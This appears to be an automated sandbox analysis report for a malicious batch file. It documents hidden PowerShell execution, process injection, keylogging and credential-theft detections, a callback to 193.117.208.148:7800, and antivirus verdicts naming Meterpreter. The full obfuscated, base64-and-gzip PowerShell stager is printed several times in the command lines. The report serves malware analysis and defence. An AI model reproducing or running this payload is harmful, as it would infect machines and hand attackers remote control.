AHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=
cmdline	powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASwBzAFAAYgAnACcAKwAnACcAVwBRAEMAQQA3AFYAVwArADIAKwBqAE8AQgBEACsALwBhAFQAOQBIADkAQQBxAFUAawBDAGIAQgB7ADEAfQBMAFkANwBVAE4AYQA2AFUAdwBvAEkAJwAnACsAJwAnAFcAMgBTAEoAcQBWADUAYgAzAFIAeQB3AFEARgB7ADEAfQBEAEUANwBCAE4ARQAzADMAOQBuACsALwBBAFUASQBmADEAMwBiAFYATwAyAGsAdABwAGMAWAAyAHoASABqADgAegBUAGMAegBYAGkAVwBoAEkAeQBnAFAAcABhAFIAWABrADMANQA4ACsARQBQAGEAagB3AEcATwBjAEMARABKAEoAYgBHAHIAVwA2AHcAaQBsAGEATABtADMAZAAyAGgAOAByAGgAZgA4AG8ALwB1AHAAYQArAFMAewAxAH0ARQBDAGIAagBjAEUARABUAHsAMgB9AFAAbAB5AFUAawByAGkAUwBJAFMAaQBuAHgAZQBiAFIATwBCADQAcABnAEUAMQA0AHkAUwBXAEYAYQBrAHsAMQB9ADYAVwBKAFQAeQBKAHkAYwBIAEgAOQBuAFQAaABDACsAaQBHAFYALwBxAHEAMgBHAGIALwBHAGIAQwArADIAYQAyAEgASABKADkASQBCAEMAdAAxADAAcgA4AHMAZABuAEwAcABXAHQAVABlAHsAMgB9AEMAcgBuADgANwBWAHQAWgBXAFIAegBVAGwAdABYAFQAbQB3AFMAegBXAEMANwBiAHUAMQBpAFEAbwBPAG8AeQBWAGwAYQBrAG4AMABwADYANABOAFYAdQBRACsAUgAnACcAKwAnACcAeQBqAHoAbwBSAGoALwBsAEsAVgBDAGMAMABiAE4AUwByAG8AegBEAEcASwA5AEkASABhADcAZQBrAFIANABUAFAAMwBiAGcAewAyAH0AJwAnACsAJwAnAGQAMwBtADgAVABVAFIARQBFAG8AWABaAHAAVgBJAHIAdQBZAHgAYwBoAHMAOQBCAHgAQgAnACcAKwAnACcAMwBrAHUAaABHAEoANAAzAEoARgBXAHEAVAAyAEYAOAB7ADEAfQBsAG4ALwBKAGkAZgAvAGgAbABFAGcAbwBhAGsARwBvAG4ARgBDAFQAaQBHADUAdABFAHQAOQBRAGgAYwBkAFgAJwAnACsAJwAnAEMAbwBjAHsAMQB9AEkASgBWAGsAdABRAGMAcwBXAEUAUQAyADkAcABhAEsAQQAyAEMAMQBmAEUANwBrAFUASgBnAHgAUQAvAFMAOQBtADUARAA3AFoARgB0AEMAOQBWADAAbAArAHEAZwBSAFMAQQB4AEUAcABGAFEAagBxAHkAMgB7ADEAfQAyAHUASgBzAHcAawBpAHUAVwBYAC8ARQB6ADUANABFAEMANAA0AEUATABBAE8ARABQAEYAewAyAH0ATgBWAHcAUwBEACsAKwBSAFUAQwBQAFMANABVAFkANQBIAHQARQBIAEIAWgBIAHsAMQB9AEMAWQBaAHEAcABmAEoAYQAwAGkAOQBlAEIAMABMAEgAaQAwAGcAMgBuAHAASwBrAHEASQBzAG4AdwBBAFgAQwByAHgAYQAyADUAWAAzAG0AdQB0AFYAcQBpAEMASQByAGwAaABzAEwASQBZAGMAKwBvAHUASAAvAFcAZgBoAGIAOABVACcAJwArACcAJwArAFAAZABEAFAANQBWADYAbQA4ADAARwBXAGQARwBRAEcATABzAFEAQgA5AFEAcABDAEMAdQAvAEYAaABXAHkAWQBpAFIARABwAEYAcQBJADkAYwBGAEQAdQBiAHoAZgBJAEsANQBCAEcAUABHAHcAUwBJAEYATwB5AGYARgBDADcAVABTAGcANABrAEYAWABUAHkAaAB6AFMAWQBRAGMAaQBHAHcAewAyAH0AWABrAEgAUQBsAGUAZgBPADUATABHAFQAeQA1ADIAdwBSAHcASwBBAEwANQA4AEQAVwAwAHMAcgBTAEIATgBTAFMATwA5AFQAWQAxAGUAYwBuAHMANQBCAHEATgB4AGkATwBJADQAcgAwAGkAQwBCAFAASABVAHEAawBrADAAdwBJADIANQBGAFEAbQBGAHsAMgB9ADkAMQBzAG8ARQBUAHoANwBMAEQAKwA2ADIAMAB1AFkAbwBBADYATwBSAFcARgB1AHEAZgB3AGIAegAvADIANQBMAFIANwBHAEkAawBvAGMAaQBDAHgAZwBjAEcAVgB7ADEAfQBpAEUAewAyAH0AeABTAHkAJwAnACsAJwAnAEcAcABTAEIAWgAxAGkAYgA2AHoAcQBWAGUAYwBYADMANABWAGsAQgBaAG0ARABCAEkASQBMAE4AMQBDAFEARwBBAGwAQgBjAEkAVwBLAFYAOABpAGMARABYAGoAaABsAEsAMQBpAGUAZwBFAEcAMABZAEMAawB7ADIAfQBrAEsAaAA4AG0AdwBCADIAVgBpAG4AeQBZAFoAdwBiAEIASAAzAFAASgBiAG4AaABiADUAawBKAHsAMgB9AC8AeABhAFkAQQA1AFkAbQBmAEUASABDAGIAYwBWACcAJwArACcAJwBHAFIAeABqAFEAUwBVAEkAZABTAG4ASQBGAGkALwA4AHUATABsAHcAVQBvAGQANgBjAFYAawBYADIAQQA1AEMATABMAEYAewAxAH0AcABPAHAASQBsAFEAdwBxAFAANQBhAFQATwBsADYAaAA2ACcAJwArACcAJwBtAEQASgBSAEkAQQBDAEIAbQB4AEEAewAyAH0AZAB4ACsAUgBMAHsAMgB9ADYAOAAzADgAawBmADEAZwBnADQAUQBqAEoAbABoADIAWgBTAHsAMgB9ADEANwBUAFcAMgBjAEsAewAxAH0AQgA3ADgAUgBiAFgAUwA0AGMAZQBpAGUAbgAzADIAMwAxAEoANwBUAGkAZwBkAHQAOAB3AGoAUgByAGIAZAAxAGoAewAxAH0AcgBJAGMAYwA5AGMAYwBtAHkARAAzAEoAQgBxAG4AUwBQAGsAdAByAHAARABpADUAcABiADAAOQBXAHUAawBEAFcAawBOAGMAKwBqAG0AagBjAGIASQBlAHsAMQB9AEsAZAA1AGcAMgB7ADIAfQBDAHoAVgBuAHMAVQBhADMAVgBxAFQAbgBtAFAAbwA5ADkAdAA2AEQASQBSAHQATgBxADIAcABoAGgAcQBOADUAawBWAEQAVwB3AE8AQQB7ADIAfQA5AEIAYgBJADcAYwBmADAATwAxAGQARgA3ADYAaABzAEYANQAwADkAVQA2AHMAYQB4ADEAMgBlAHQAYQA2AHsAMQB9AEoANwBVAHoAZgBtAEUAVwBXAHIAVAA5AEYAYwBUAEgAdAB0AGYAWgBvAGEAcQBxAHMAYwB1AE4AbgBvADcAaABIAFQAdQBOAG4AcQAnACcAKwAnACcANwBhAGUAMgBTAFgAMQBsAE8AbwBEAGQARAByAGgANgAzAG0AbQB0ADAAaQBsAEEAcgBQAEIAMgBiAE8AagArAGYANgBSAEUAYQBxAEcAUABzAGIAZgBoADIATwBoADIAeQB0AHQAZABDACsAdQBjAG0ASgBmAFAAaAB5AE4AUwBIAFEAMQBOAEgAJwAnACsAJwAnAG8ALwBiADMARwArAE4AWQA5AGQAVABqAHkAUgBUADcAKwBtAFIAYwBwAC8AUABOADkATgBLAEgAdQBiAG0AMQBoAHUAZQBxADEAdQB5ADQANQBKADcAUAB0AHcAQgBjAG0AeQBQAHMAWABZAEsAewAyAH0AMQA2AG8ANwAvAGcAcABrAGoARQA5AEkALwA5AFQAbgBjAFIAMgB7ADEAfQBkAFkANQAwAGsARABIAG4ATgA2AGoAdAB6AHoAYgBtAGcAewAyAH0ASAArADEAYQBqAE8AMABaAGoAMQBwAHgAaAAxADUAegB0AFQAVgBXAHUAegBRAFIATgBaAEcAcAArADAAUABUAFEARQBjAGUAegBwAFEANAB6AGkAVwArAFAAZQBVAEcAdABqAGwANwB1AFQAegAvADMAWgBTAGgAMQBQACcAJwArACcAJwAyAGEARgBxAHQASQBZAEQAZgA1AHIAZQBXAGQAMABFADYAZAArAHQAWgBaAHcANwA4ADkAcgBXAHUAVABnADgANgBrADcAbwBPAE8AQgBvAHAASwByAGoAagA4AEMASwB4AFkAaQBHAG8AbABGAGYAbABwAEwAcABkAE4AVgBKAEsAKwBpAEgAUAAwAHAAYgByAC8AMgBFAEcAbQAvADEAaAB4ADYATwBZAGgAOAB6AG8AQQB4AFUALwBpAEoALwBUAFIANgBaACsAMABvACsANABEAFQAVgBrAE8AWAAwAFQAYgBBAG0AVQBVAGcAJwAnACsAJwAnAFkATgBGAEYAbwBzAHcAWABuAEUAVwBQAGMAUwBUAHMASgAnACcAKwAnACcAbABIAHoAbwBZAFgAbABuAFMAUgB7ADEAfQBkAHEASgAnACcAKwAnACcAUAA1ADkATgBxAFgASQBqADAASQBLAG8AOABOAHAAbABnADYATwBaAG0ARABpADUAQgBFAEcAYgAyAHIAWABSAEoANgB3AHEAOQBvAGQAdwAxAE4AZwA4ADYAZwAzAFcAbgBOAEwARgAzAGUAZgA3AHsAMgB9AFcAMwArAHoAawAzAEYAbwBsAGIAUwA0AHAATgBBAC8AbQBXAFcAWQBlAEwATgBLAFYASgB7ADIAfQB1AC8ASABTADUANABRAHcAaQBvAFoARwA4AEIAOQBoAFoAMgBjAFAAQQBhAHEAZwA3AFUAdwBiAHcAUwBwAEEAagBxAG4ATABPAG4AKwBPAFgAWABlACcAJwArACcAJwB1AEQAQwB7ADIAfQAvAFEAQQB0AGgAcgBjAGYASgBHACsASABuAEsAVwBnAEkAawBEAGMAaQBPAFYAUgBOAHAAYwBuAHoAYgByAEUAagA2ADcASAAwAFMALwBsAFQAcgA3AG0AdQBiAEQAUAAvAGYAWAAxAEgAJwAnACsAJwAnAGwAYwArADgAWAB1AHUAKwBpAGsAVgBUAEoAOABYAHEAdwArAFgAMwAnACcAKwAnACcAagBTAEQAbgA3AGYAOQBTAGUAWQBDAGgAQwAwAG8AUwA0AHoAawBqADgAWQBYAGsATgBoAG4AeQB0AFAAQQBwAHgARgBCAGoASgBoAHQAUgAvAHAATwAvAG8AaQBFAFEAZAA5AGUASgBsAGwAewAxAH0AZQBFAGYAVwBoAGYAQwBQAGMASQBMAEEAJwAnACsAJwAnAEEAQQB7ADAAfQAnACcAKQAtAGYAJwAnAD0AJwAnACwAJwAnAHYAJwAnACwAJwAnAE0AJwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Aug. 12, 2024, 9:14 a.m.	thread_identifier: 2412 thread_handle: 0x00000450 process_identifier: 2408 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAKsPb'+'WQCA7VW+2+jOBD+/aT9H9AqUkCbB{1}LY7UNa6UwoI'+'W2SJqV5b3RywQF{1}DE7BNE339n+/AUIf13bVO2ktpcX2zHj8zTczXiWhIygPpaRXk358+EPajwGOcCDJJbGrW6wilaLm3d2h8rhf8o/upa+S{1}ECbjcEDT{2}PlyUkriSISinxebROB4pgE14ySWFak{1}6WJTyJycHH9nThC+iGV/qq2Gb/GbC+2a2HHJ9IBCt10r8sdnLpWtTe{2}Crn87VtZWRzUltXTmwSzWC7bu1iQoOoyVlakn0p64NVuQ+R'+'yjzoRj/lKVCc0bNSrozDGK9IHa7ekR4TP3bg{2}'+'d3m8TUREEoXZpVIruYxchs9BxB'+'3kuhGJ43JFWqT2F8{1}ln/Jif/hlEgoakGonFCTiG5tEt9QhcdX'+'Coc{1}IJVktQcsWEQ29paKA2C1fE7kUJgxQ/S9m5D7ZFtC9V0l+qgRSAxEpFQjqy2{1}2uJswkiuWX/Ez54EC44ELAODPF{2}NVwSD++RUCPS4UY5HtEHBZH{1}CYZqpfJa0i9eB0LHi0g2npKkqIsnwAXCrxa25X3mutVqiCIrlhsLIYc+ouH/Wfhb8U'+'+PdDP5V6m80GWdGQGLsQB9QpCCu/FhWyYiRDpFqI9cFDubzfIK5BGPGwSIFOyfFC7TSg4kFXTyhzSYQciGw{2}XkHQlefO5LGTy52wRwKAL58DW0srSBNSSO9TY1ecns5BqNxiOI4r0iCBPHUqkk0wI25FQmF{2}91soETz7LD+620uYoA6ORWFuqfwbz/25LR7GIkociCxgcGV{1}iE{2}xSy'+'GpSBZ1ib6zqVecX34VkBZmDBIILN1CQGAlBcIWKV8icDXjhlK1iegEG0YCk{2}kKh8mwB2VinyYZwbBH3PJbnhb5kJ{2}/xaYA5YmfEHCbcV'+'GRxjQSUIdSnIFi/8uLlwUod6cVkX2A5CLLF{1}pOpIlQwqP5aTOl6h6'+'mDJRIACBmxA{2}dx+RL{2}6838kf1gg4QjJlh2ZS{2}17TW2cK{1}B78RbXS4ceien3231J7Tigdt8wjRrbd1j{1}rIcc9ccmyD3JBqnSPktrpDi5pb09WukDWkNc+jmjcbIe{1}Kd5g2{2}CzVnsUa3VqTnmPo99t6DIRtNq2phhqN5kVDWwOA{2}9BbI7cf0O1dF76hsF509U6sax12eta6{1}J7UzfmEWWrT9FcTHttfZoaqqscuNno7hHTuNnq'+'7ae2SX1lOoDdDrh63mmt0ilArPB2bOj+f6REaqGPsbfh2Oh2yttdC+ucmJfPhyNSHQ1NH'+'o/b3G+NY9dTjyRT7+mRcp/PN9NKHubm1hueq1uy45J7PtwBcmyPsXYK{2}16o7/gpkjE9I/9TncR2{1}dY50kDHnN6jtzzbmg{2}H+1ajO0Zj1pxh15ztTVWuzQRNZGp+0PTQEcezpQ4ziW+PeUGtjl7uTz/3ZSh1P'+'2aFqtIYDf5reWd0E6d+tZZw789rWuTg86k7oOOBopKrjj8CKxYiGolFflpLpdNVJK+iHP0pbr/2EGm/1hx6OYh8zoAxU/iJ/TR6Z+0o+4DTVkOX0TbAmUUg'+'YNFFoswXnEWPcSTsJ'+'lHzoYXlnSR{1}dqJ'+'P59NqXIj0IKo8Nplg6OZmDi5BEGb2rXRJ6wq9odw1Ng86g3WnNLF3ef7{2}W3+zk3FolbS4pNA/mWWYeLNKVJ{2}u/HS54QwioZG8B9hZ2cPAaqg7UwbwSpAjqnLOn+OXXe'+'uDC{2}/QAthrcfJG+HnKWgIkDciOVRNpcnzbrEj67H0S/lTr7mubDP/fX1H'+'lc+8Xuu+ikVTJ8Xqw+X3'+'jSDn7f9SeYChC0oS4zkj8YXkNhnytPApxFBjJhtR/pO/oiEQd9eJll{1}eEfWhfCPcILA'+'AA{0}')-f'=','v','M')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000045c	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x054c0000 process_handle: 0xffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 12, 2024, 9:14 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Aug. 12, 2024, 9:14 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (50 out of 62 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl

Communicates with host for which no DNS query was performed (1 event)

host

193.117.208.148

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAKsPb'+'WQCA7VW+2+jOBD+/aT9H9AqUkCbB{1}LY7UNa6UwoI'+'W2SJqV5b3RywQF{1}DE7BNE339n+/AUIf13bVO2ktpcX2zHj8zTczXiWhIygPpaRXk358+EPajwGOcCDJJbGrW6wilaLm3d2h8rhf8o/upa+S{1}ECbjcEDT{2}PlyUkriSISinxebROB4pgE14ySWFak{1}6WJTyJycHH9nThC+iGV/qq2Gb/GbC+2a2HHJ9IBCt10r8sdnLpWtTe{2}Crn87VtZWRzUltXTmwSzWC7bu1iQoOoyVlakn0p64NVuQ+R'+'yjzoRj/lKVCc0bNSrozDGK9IHa7ekR4TP3bg{2}'+'d3m8TUREEoXZpVIruYxchs9BxB'+'3kuhGJ43JFWqT2F8{1}ln/Jif/hlEgoakGonFCTiG5tEt9QhcdX'+'Coc{1}IJVktQcsWEQ29paKA2C1fE7kUJgxQ/S9m5D7ZFtC9V0l+qgRSAxEpFQjqy2{1}2uJswkiuWX/Ez54EC44ELAODPF{2}NVwSD++RUCPS4UY5HtEHBZH{1}CYZqpfJa0i9eB0LHi0g2npKkqIsnwAXCrxa25X3mutVqiCIrlhsLIYc+ouH/Wfhb8U'+'+PdDP5V6m80GWdGQGLsQB9QpCCu/FhWyYiRDpFqI9cFDubzfIK5BGPGwSIFOyfFC7TSg4kFXTyhzSYQciGw{2}XkHQlefO5LGTy52wRwKAL58DW0srSBNSSO9TY1ecns5BqNxiOI4r0iCBPHUqkk0wI25FQmF{2}91soETz7LD+620uYoA6ORWFuqfwbz/25LR7GIkociCxgcGV{1}iE{2}xSy'+'GpSBZ1ib6zqVecX34VkBZmDBIILN1CQGAlBcIWKV8icDXjhlK1iegEG0YCk{2}kKh8mwB2VinyYZwbBH3PJbnhb5kJ{2}/xaYA5YmfEHCbcV'+'GRxjQSUIdSnIFi/8uLlwUod6cVkX2A5CLLF{1}pOpIlQwqP5aTOl6h6'+'mDJRIACBmxA{2}dx+RL{2}6838kf1gg4QjJlh2ZS{2}17TW2cK{1}B78RbXS4ceien3231J7Tigdt8wjRrbd1j{1}rIcc9ccmyD3JBqnSPktrpDi5pb09WukDWkNc+jmjcbIe{1}Kd5g2{2}CzVnsUa3VqTnmPo99t6DIRtNq2phhqN5kVDWwOA{2}9BbI7cf0O1dF76hsF509U6sax12eta6{1}J7UzfmEWWrT9FcTHttfZoaqqscuNno7hHTuNnq'+'7ae2SX1lOoDdDrh63mmt0ilArPB2bOj+f6REaqGPsbfh2Oh2yttdC+ucmJfPhyNSHQ1NH'+'o/b3G+NY9dTjyRT7+mRcp/PN9NKHubm1hueq1uy45J7PtwBcmyPsXYK{2}16o7/gpkjE9I/9TncR2{1}dY50kDHnN6jtzzbmg{2}H+1ajO0Zj1pxh15ztTVWuzQRNZGp+0PTQEcezpQ4ziW+PeUGtjl7uTz/3ZSh1P'+'2aFqtIYDf5reWd0E6d+tZZw789rWuTg86k7oOOBopKrjj8CKxYiGolFflpLpdNVJK+iHP0pbr/2EGm/1hx6OYh8zoAxU/iJ/TR6Z+0o+4DTVkOX0TbAmUUg'+'YNFFoswXnEWPcSTsJ'+'lHzoYXlnSR{1}dqJ'+'P59NqXIj0IKo8Nplg6OZmDi5BEGb2rXRJ6wq9odw1Ng86g3WnNLF3ef7{2}W3+zk3FolbS4pNA/mWWYeLNKVJ{2}u/HS54QwioZG8B9hZ2cPAaqg7UwbwSpAjqnLOn+OXXe'+'uDC{2}/QAthrcfJG+HnKWgIkDciOVRNpcnzbrEj67H0S/lTr7mubDP/fX1H'+'lc+8Xuu+ikVTJ8Xqw+X3'+'jSDn7f9SeYChC0oS4zkj8YXkNhnytPApxFBjJhtR/pO/oiEQd9eJll{1}eEfWhfCPcILA'+'AA{0}')-f'=','v','M')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2220 resumed a thread in remote process 2264
NtResumeThread Aug. 12, 2024, 9:14 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2264	1	0	0

Creates a suspicious Powershell process (6 events)

option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

193.117.208.148:7800

File has been identified by 31 AntiVirus engines on VirusTotal as malicious (31 events)

CAT-QuickHeal	Script.Trojan.42447
McAfee	PS/Injector.d
ALYac	Trojan.Script.905440
VIPRE	Trojan.Script.905440
Sangfor	Trojan.Generic-Script.Save.4c97a2d4
Arcabit	Trojan.Script.DDD0E0
Symantec	Meterpreter
ESET-NOD32	PowerShell/Agent.WO
Avast	VBS:Obfuscated-GQ [Cryp]
Cynet	Malicious (score: 99)
Kaspersky	Trojan.PowerShell.Agent.v
BitDefender	Trojan.Script.905440
NANO-Antivirus	Trojan.Text.Downloader.fqlyhy
MicroWorld-eScan	Trojan.Script.905440
Emsisoft	Trojan.Script.905440 (B)
F-Secure	Trojan.TR/PowerShell.Gen
DrWeb	PowerShell.DownLoader.36
McAfee-GW-Edition	PS/Injector.d
FireEye	Trojan.Script.905440
Sophos	Mal/PSDL-B
Ikarus	Trojan-Dropper.PowerShell.Ploty
Avira	TR/PowerShell.Gen
Xcitium	TrojWare.VBS.Agent.NUI@8a4oj4
ZoneAlarm	Trojan.PowerShell.Agent.v
GData	Trojan.Script.905440
Google	Detected
AhnLab-V3	BAT/Agent
Tencent	Unk.Win32.Script.403896
MAX	malware (ai score=89)
Fortinet	PowerShell/Agent.D!tr
AVG	VBS:Obfuscated-GQ [Cryp]

tc10two.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All